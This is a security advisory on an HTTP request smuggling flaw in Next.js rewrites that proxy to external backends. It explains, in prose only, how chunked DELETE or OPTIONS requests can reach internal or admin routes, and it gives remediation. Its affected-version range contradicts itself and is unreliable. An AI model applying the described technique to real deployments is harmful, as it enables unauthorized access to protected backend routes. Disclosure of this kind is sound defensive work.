Next.js HTTP Request Smuggling Vulnerability in Rewrites

A vulnerability allowing HTTP request smuggling has been identified in Next.js versions 9.5.0 through 15.5.13 and 16.1.7 prior to 16.1.7. When Next.js rewrites proxy traffic to an external backend, a crafted DELETE or OPTIONS request using Transfer-Encoding: chunked could create a request boundary disagreement between the proxy and backend. This flaw could be exploited to smuggle a second request to unintended backend routes, such as internal or admin endpoints, bypassing normal rewrite destination assumptions. The issue does not affect applications on providers that manage rewrites at the CDN level, like Vercel.

Impact

Exploitation of this vulnerability could lead to unauthorized access to backend routes that are not intended to be exposed, allowing attackers to bypass normal rewrite path assumptions and potentially access sensitive internal or administrative endpoints.

Reproduction

The vulnerability can be reproduced by sending a DELETE or OPTIONS request with Transfer-Encoding set to chunked through a rewritten route. This can be done by configuring a Next.js application to use a rewrite that proxies requests to an external backend, and then sending the crafted request that takes advantage of the request boundary disagreement between the proxy and backend.

Remediation

Users can upgrade to Next.js versions 15.5.13 or 16.1.7, where this vulnerability has been patched. If an immediate upgrade is not possible, chunked DELETE or OPTIONS requests can be blocked on rewritten routes at the edge or proxy, and authentication or authorization can be enforced on backend routes.